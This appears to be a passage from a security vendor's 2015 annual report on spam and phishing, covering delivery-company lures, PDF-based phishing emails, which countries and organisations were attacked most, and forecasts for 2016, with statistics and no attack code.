Other popular themes of the year

As we mentioned in Q1, the contribution of the ‘Delivery company’ category is very small (0.23%), but it has recently experienced a slight increase (+0.04 p.p.). In addition, DHL, one of the companies in this category, was among the Top 100 organizations most often targeted by phishers.

This method – an email sent on behalf of a delivery firm – is often used by fraudsters to distribute malicious attachments, gather personal information and even collect money.

Phishing email sent on behalf of FedEx

The attackers are especially active in this category in the run-up to holidays when people tend to buy presents using popular delivery services.

Email tricks

Scammers have long made successful use of PDF attachments in phishing attacks. These files are usually a form for entering personal information that is sent to the fraudsters by pressing a button in the file. However, in 2015 we saw a surge of emails in which the text message and the link to the phishing page were included in the PDF document. The text in the body of the message was reduced to a minimum to bypass spam filtering.

These tricks are used against organizations in all categories. In 2015, many attacks of this type targeted banking and mail organizations.

Example of a phishing email. The body of the message contains only the text imitating the heading of the email to which this email is allegedly responding. The email has an attached PDF file that contains the link to the phishing page.

We came across numerous PDF files that redirected victims to phishing websites. The fraudsters encouraged the user to click on ‘View pdf File’ to read the contents of the file.

A phishing email with an attached PDF file containing a redirect to a phishing website

The geography of attacks Top 10 countries by percentage of attacked users

Japan had the highest proportion of users subjected to phishing attacks (21.68%), a 2.17 p.p. increase from the previous year.

The percentage of users on whose computers the anti-phishing system was triggered out of the total number of users of Kaspersky Lab products in the country, 2015

Top 10 countries by percentage of attacked users

Japan 21.68% Brazil 21.63% India 21.02% Ecuador 20.03% Mozambique 18.30% Russia 17.88% Australia 17.68% Vietnam 17.37% Canada 17.34% France 17.11%

Last year’s leader, Brazil (21.63%), fell to second place with a drop of 5.77 percentage points in the number of attacked users. It was followed by India (21.02%, -2.06 p.p.) and Ecuador (20.03%, -2.79 p.p.).

The distribution of attacks by country

Russia accounted for the greatest share of phishing attacks, with 17.8% of the global total, an increase of 0.62 percentage points compared to the previous year.

Distribution of phishing attacks by country in 2015

Behind Russia in second place was Brazil (8.74%, +1.71 p.p.), followed by India (7.73%, +0.58 p.p.), the US (7.52%, +0.32 p.p.), with Italy rounding off the Top 5 (7.04%, +1.47 p.p.).

Organizations under attack

The statistics on organizations used in phishing attacks are based on the triggering of the heuristic component in the anti-phishing system. The heuristic component is triggered when a user tries to follow a link to a phishing page and there is no information about the page in Kaspersky Lab’s databases.

Distribution of organizations subject to phishing attacks by category, 2015

In 2015, we saw significant growth in the proportion of phishing attacks on organizations belonging to the ‘Online finances’ category (34.33%, +5.59 pp): they include the ‘Banks’, ‘Payment Systems’ and ‘Online stores’ categories. Of note is the increase in the percentage of targeted organizations in the ‘Telephone and Internet service providers’ (5.50%, +1.4 p.p.) and ‘Social networking sites and blogs’ (16.40%, +0.63 p.p.) categories.

Top 3 organizations attacked

Organization % of detected phishing links 1 Yahoo! 14.17 2 Facebook 9.51 3 Google 6.8

In 2015, Yahoo! was once again the organization targeted most by phishers, although its share decreased considerably – 14.17% vs 23.3% in 2014. We presume this decrease is a result of the company combating these fake domains. We see that Yahoo!, as well as many other organizations, registers lots of domains that could theoretically be used by the attackers as they are derived from the original domain name.

Conclusion and forecasts

In 2015, the proportion of spam in email traffic decreased by 11.48 percentage points and accounted for 55.28%. The largest decline was observed in the first quarter; from April the fluctuations stabilized and were within a few percentage points. This reduction was caused by the migration of advertising for legal goods and services from spam flows to more convenient and legal platforms (social networks, coupon services, etc.), as well as by the expansion of the “gray” zone in mass mailings (mass mailings sent both to voluntary subscribers and to people who have not given their consent). We assume the share of spam will continue to decrease in 2016, though the decline will be insignificant.

The number of malicious and fraudulent messages, however, will increase. It is possible that the attackers will once again make use of their customary tricks as was the case in 2015 (mass mailings of macro viruses and non-standard attachment extensions). The mobile theme may also become yet another weapon in the cybercriminals’ arsenal to spread malware and fraudulent spam.

The number of new domains created by spammers especially for distributing mass mailings will continue to grow. We also expect to see an expansion in new domain zones used as spammer resources.